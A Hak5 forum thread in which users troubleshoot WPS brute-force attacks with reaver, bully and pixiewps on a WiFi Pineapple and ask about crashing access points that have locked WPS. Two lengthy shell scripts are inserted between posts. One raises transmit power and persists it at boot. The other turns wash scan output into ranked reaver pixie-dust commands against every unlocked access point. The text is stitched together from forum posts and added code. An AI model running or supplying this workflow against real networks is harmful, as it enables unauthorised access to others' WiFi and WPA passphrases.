Hak5 Forums


I will send an update to include additional checks for an SD install of reaver.

I haven't installed anything on the SD card though. I updated the firmware, installed the infusion and then everything else (reaver, bully, pixiewps) on internal storage. Any idea what might be causing all of the above?


The new firmware, as you know, now uses the latest aircrack, which sets the monitor interface as wlanxmon. The infusion was designed before this update, so there needs to be an update to scan with wlanxmon.

As for reaver and bully not associating: while you do have good signal strength, there could be interference somewhere. Have you tried upping your txpower on the attacking interface? If not, try setting it to 30dBm.


I literally just got my Pineapple 2 days ago; I didn't know what has been going on with the infusion.

But yeah, I SSHed into the Pineapple, used wash and tried reaver again, and still got timeouts for the APs that in my experience would have worked before (RSSI between -60 and -68).

How can I increase the txpower on wlan1 though? I've tried the usual ifconfig command but it's not working. Also, how much is it safe to increase it by, and for how long, on the Pineapple?

Thank you.


If your local laws permit upping to and using 30dBm, you should be fine running the rtl8187 (wlan1) at that for quite some time, a few hours at least. Just let it take a break for a while if you don't have a fan cooling it on the bottom vents.


Cheers, that worked. Got a couple more questions though.

How can I permanently modify the region and txpower so I don't have to change it every time?

Also, what the heck is the problem with reaver? I tested it on a couple of different APs and so far all I got were either timeouts (90% of the time), or it worked for the first pin, after which it timed out again. These were all -58 to -68, which should've been enough. Instead, I figured I should give bully a shot, and funny enough, after trying a reaver attack and a bully one successively on each AP, bully actually worked about 80% of the time. I'm going to get a 9 dBi antenna tomorrow and give it another shot.

And finally, are there any ways to crash an AP which has locked the WPS? I know about mdk3 attacks and I remember trying the revdk3 script a while ago, but with no results unfortunately. Are there any similar tools available for the pineapple? Or for Kali? I found another thread about using wlan1 with Kali so I will try that if there are any alternatives to revdk3.

Thanks for all the help though.


The problem you are having with reaver seems like it could be fixed by setting a timeout length. I am unsure which switch(es) it is at the moment, but reaver --help will outline this for you.

Reaver can be a bit more picky than bully at times, and vice versa. But I suspect that the issue you and a few others are having is the quality of the signal, not just the strength. So try with a different antenna; the 9dBi works nicely.

Also, for setting the txpower on boot, you can use a dipswitch setup to run the commands :-)
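The two replies above (upping the rtl8187 to 30dBm for a session, and running the same commands at boot) as an added shell example. This is not code from the thread or from Hak5; it assumes the attacking radio is wlan1, that the firmware is OpenWrt-like with an /etc/rc.local ending in "exit 0", that iw and ip are installed, and it uses the country code BO only because that regulatory domain is commonly chosen for permitting 30 dBm. Whether you may transmit at that level is a matter of local law, as the reply says. The script can equally be called from a dipswitch action, which is what the reply suggests, instead of rc.local.

```shell
#!/bin/sh
# Added example (not from the thread): raise the attacking radio's tx power and
# persist the change at boot. Assumed: wlan1 is the rtl8187, /etc/rc.local exists
# and ends in "exit 0", iw and ip are present, BO permits 30 dBm (check local law).

IW=${IW:-iw}            # iw binary; can be pointed at a stub for a dry run
IP=${IP:-ip}            # ip binary; same
IFACE=${IFACE:-wlan1}
DBM=${DBM:-30}
COUNTRY=${COUNTRY:-BO}  # assumption: regulatory domain that allows 30 dBm

# iw takes tx power in mBm (hundredths of a dBm): 30 dBm -> 3000
dbm_to_mbm() {
    echo $(( $1 * 100 ))
}

# One-off change for the current session.
# Usage: set_txpower <iface> <dBm> <country-code>
set_txpower() {
    iface=$1; dbm=$2; country=$3
    $IW reg set "$country"                                     || return 1
    $IP link set "$iface" down                                 || return 1
    $IW dev "$iface" set txpower fixed "$(dbm_to_mbm "$dbm")"  || return 1
    $IP link set "$iface" up                                   || return 1
    # Echo back what the driver actually accepted; the card may clamp it.
    $IW dev "$iface" info | awk '/txpower/ { print "txpower now", $2, $3 }'
}

# Persist the same commands in an rc.local-style boot script: insert them
# before the trailing "exit 0" and refuse to add them twice.
# Usage: persist_txpower <iface> <dBm> <country-code> [path-to-rc.local]
persist_txpower() {
    iface=$1; dbm=$2; country=$3; rc=${4:-/etc/rc.local}
    marker='# txpower-on-boot (added by persist_txpower)'
    if [ -f "$rc" ] && grep -q 'txpower-on-boot' "$rc"; then
        return 0                                  # already installed
    fi
    tmp=$(mktemp) || return 1
    # keep the existing script minus its final "exit 0"
    [ -f "$rc" ] && grep -v '^exit 0$' "$rc" > "$tmp" || :
    cat >> "$tmp" <<EOF
$marker
iw reg set $country
ip link set $iface down
iw dev $iface set txpower fixed $(dbm_to_mbm "$dbm")
ip link set $iface up
exit 0
EOF
    mv "$tmp" "$rc" && chmod 755 "$rc"
}

# ./txpower.sh apply    -> change it now
# ./txpower.sh persist  -> install into rc.local for every boot
case "${1:-}" in
    apply)   set_txpower "$IFACE" "$DBM" "$COUNTRY" ;;
    persist) persist_txpower "$IFACE" "$DBM" "$COUNTRY" ;;
esac
```

The interface is taken down before the txpower call because some drivers only accept a fixed setting while the link is down; the final iw dev info line shows what the driver really applied, which is the value to trust rather than the one you asked for.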


Having a couple of issues. First off, running reaver (just a simple "reaver -i wlan1mon") doesn't return any results. Tested this by turning on WPS on my home router and a couple of test routers as well, no dice. It can see the broadcast SSIDs in the WPS infusion interface though. Second, and somewhat related, the table that shows all detected APs (so, airodump) has a field for WPS, but all entries are a "-". When I scan the APs with an old ALFA AWUS036 I can see WPS is active on the test routers. I have a sneaking suspicion it's related to the 2.4 firmware and the new version of aircrack, but figured I'd see if anyone else was having similar issues.


For the first issue, reaver -i wlanxmon is invalid usage. You must at the least supply a target BSSID (-b).

And for airodump, are you doing airodump-ng -i wlanxmon --wps?


Yeah, it should be reaver -i wlan1mon -b ma:ca:dd:rr:es:ss -vvv -K 1 to start (pixiewps attack), or just reaver on its own will show all commands and options for it, including the fork's.

BTW datahead, any chance of helping out with Terry's fork for the Reaver Pro II? (I installed pixie and your fork with a bit of pain on it, but it would be nice with his GUI.)
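The two replies above (reaver needs a target -b, and the pixie-dust invocation with -vvv -K 1) together with the earlier note that a timeout switch exists, as an added shell example that is not code from the thread or from the reaver/wash authors. It reads wash output, keeps only unlocked APs above a chosen RSSI, and emits one reaver command per target. Assumptions: the monitor interface is wlan1mon; wash prints the six-column layout shown in the constructed sample (BSSID, Channel, RSSI, WPS Version, WPS Locked, ESSID), as older wash versions do; reaver is the pixiewps-capable fork that accepts -K 1; -t is reaver's receive timeout in seconds. The BSSIDs in the sample are made up.

```shell
#!/bin/sh
# Added example (not from the thread): turn a wash listing into reaver commands.
# Assumed: wlan1mon, the older six-column wash layout, a reaver fork with -K.

MON=${MON:-wlan1mon}
RX_TIMEOUT=${RX_TIMEOUT:-10}   # reaver -t: seconds to wait for a reply (default is 5)

# Constructed sample in the layout of `wash -i wlan1mon`; these are not real APs.
SAMPLE_WASH='BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
00:11:22:33:44:55       6            -66        1.0               No                Lab Net A
66:77:88:99:AA:BB      11            -58        1.0               Yes               LabNet-B
CC:DD:EE:FF:00:11       1            -60        1.0               No                LabNet-C
DD:EE:FF:00:11:22       3            -81        1.0               No                LabNet-D'

# Read wash output on stdin; keep unlocked APs at or above a minimum RSSI.
# Prints: <bssid> <channel> <rssi> <essid>
# Usage: wash_targets [min-rssi-dBm]   (default -70)
wash_targets() {
    awk -v min="${1:--70}" '
        # data rows start with a 17-character MAC; header and rule lines do not
        length($1) == 17 && $1 ~ /^[0-9A-Fa-f:]+$/ {
            rssi = $3 + 0
            essid = $6
            for (i = 7; i <= NF; i++) essid = essid " " $i   # ESSIDs may contain spaces
            if ($5 == "No" && rssi >= min)
                print $1, $2, rssi, essid
        }'
}

# Build one reaver invocation for a target: -b is mandatory, -c pins the
# channel, -vvv shows every M1..M7 exchange, -K 1 tries pixie dust first,
# -t widens the receive timeout for APs that answer slowly.
# Usage: reaver_cmd <bssid> <channel>
reaver_cmd() {
    printf 'reaver -i %s -b %s -c %s -vvv -K 1 -t %s\n' "$MON" "$1" "$2" "$RX_TIMEOUT"
}

# Wash listing -> list of commands, strongest signal first.
# Usage: plan_attacks [min-rssi-dBm] < wash-output
plan_attacks() {
    wash_targets "$1" | sort -k3,3nr | while read -r bssid ch rssi essid; do
        echo "# $essid ($rssi dBm)"
        reaver_cmd "$bssid" "$ch"
    done
}

printf '%s\n' "$SAMPLE_WASH" | plan_attacks -70
```

Locked APs are dropped rather than attacked with -L, because a locked AP is the symptom the thread is asking about and hammering it only lengthens the lockout. The -S (small DH keys) switch is deliberately not included, given the report further down the thread that it suppressed the passphrase output.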


"reaver no longer provides the WPA pass after cracking the WPS pin."

I had tested, and it does.

Do you have the highest verbose mode enabled? (-vvv)

That should be enabled if not.

Also, some APs do not report back the WPA password, but will with the pin only.

A bit of a self-note: I should make a change back to reaver so that only -vv is required again.


Tried with -vvv again, and it looks like the -S option borks the process and only spits out the WPS pin?

Without the -S, it spits out both pass and pin.
